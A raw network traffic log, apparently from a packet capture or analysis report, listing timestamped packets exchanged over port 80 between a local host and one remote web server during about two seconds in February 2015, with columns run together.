Feb 19, 2015 13:01:58.531810045 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.531829119 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.531976938 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.531991005 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.532082081 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.536916971 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.536926031 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.536928892 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537038088 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.537331104 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537339926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537427902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.537437916 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537525892 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.542785883 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566746950 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566764116 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566852093 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.566863060 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566947937 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.630913019 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631623030 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631639957 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631758928 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.631779909 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631874084 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.636456013 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636473894 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636476994 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636598110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.636801004 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636806965 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636908054 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.636925936 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.637017965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.643008947 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.654889107 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.654910088 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.655093908 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.655118942 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.655205965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.730249882 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.730910063 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.730926037 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.731034994 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.731055975 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.731151104 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.737787008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.737807989 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.737812042 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.737972021 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.738429070 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.738482952 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.738615036 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.738637924 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.738759041 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.742296934 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.742312908 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.742316008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.742463112 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.748815060 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.790353060 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832084894 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832108974 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832256079 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.832279921 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832609892 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.836440086 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836460114 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836463928 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836584091 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.836656094 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836673021 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836781979 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.836801052 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836941004 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.842396021 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.870721102 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.870732069 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.870893002 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.870907068 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.871011019 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.930738926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.931729078 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.931746006 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.931922913 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.931946039 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.932068110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.936877012 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.936894894 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.936897993 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937109947 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.937202930 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937221050 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937334061 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.937352896 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937444925 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.943394899 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967006922 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967029095 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967257023 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.967279911 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967395067 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.030251026 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031028986 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031045914 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031188965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.031210899 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031332016 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.037748098 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.037767887 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.037770987 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.037992954 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.038433075 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.038450003 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.038630009 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.038651943 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.038769007 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.042596102 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067202091 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067224979 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067404032 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.067426920 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067548990 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.137345076 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.140702963 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.140717030 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.140934944 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.140959024 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.141063929 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.142179966 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.142195940 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.142199039 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.142335892 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.144345999 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.144361973 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.144524097 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.144542933 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.144639015 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.151237965 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.151258945 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.151262045 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.151474953 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.231450081 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.231472015 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.231475115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.231681108 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.231746912 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.237160921 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237180948 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237184048 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237384081 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.237593889 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237611055 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237715960 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.237735033 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237864971 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.242947102 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255680084 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255701065 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255872965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.255896091 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255990028 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.267285109 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331008911 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331031084 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331249952 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.331273079 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331401110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.336451054 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336469889 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336472988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336631060 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.336680889 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336698055 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336796045 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.336812973 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336895943 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.342415094 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.365793943 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.365814924 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.365999937 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.366023064 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.366132975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.432063103 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435595036 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435612917 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435834885 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.435857058 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435971975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.440133095 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440150976 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440154076 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440345049 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.440890074 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440907001 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.441025972 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.441046000 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.441144943 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.444833040 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.456792116 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.456813097 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.456991911 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.457015038 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.457125902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.533893108 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.535803080 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.535820007 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.535995960 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.536017895 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.536117077 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.538635015 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.538641930 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.538645983 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.538799047 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.539542913 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.539558887 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.539664984 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.539685011 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.539783001 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.546384096 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.746504068 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.746656895 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.966924906 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.966950893 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967108965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967142105 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967152119 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967155933 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967289925 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967310905 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967318058 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967320919 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967466116 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967487097 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967492104 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967494965 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967545986 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967552900 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967567921 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967571020 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967749119 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967768908 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967773914 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967827082 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967843056 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967892885 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967911959 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967917919 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967921019 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967957973 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967977047 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967991114 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968185902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968230009 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968238115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968290091 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968332052 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968338013 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968349934 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968352079 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968354940 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968383074 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968391895 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968396902 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968508959 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968614101 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968624115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968636036 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968672991 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968691111 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968696117 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968741894 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968759060 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968775988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968797922 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968813896 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968992949 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.969012976 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.969064951 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.969125032 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.969242096 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980128050 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980143070 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980149984 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980154037 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980285883 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980299950 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980343103 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980446100 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980453014 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980453968 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980463028 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980603933 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980648994 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980683088 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980690956 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980695009 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980844975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980890036 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980899096 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032473087 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032485008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032634974 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.032645941 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032774925 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.036029100 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036039114 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036042929 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036169052 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.036432028 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036437988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036576033 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.036586046 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036742926 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.043682098 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055450916 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055464983 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055634975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.055659056 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055793047 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.134943008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137120008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137140989 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137248039 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.137268066 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137370110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.141401052 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141419888 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141422987 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141557932 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.141774893 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141782045 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141885996 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.141902924 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141988993 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.146601915 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.299994946 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.967787027 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967808962 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967811108 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967932940 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967936993 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967983961 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968132973 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968151093 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968172073 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968175888 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968179941 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968182087 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968218088 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968327999 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968346119 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968375921 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968413115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968417883 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968451023 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968482018 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968524933 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968528986 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968532085 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968559027 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968635082 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968641043 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968648911 MEZ801032216.194.168.39192.168.1.10
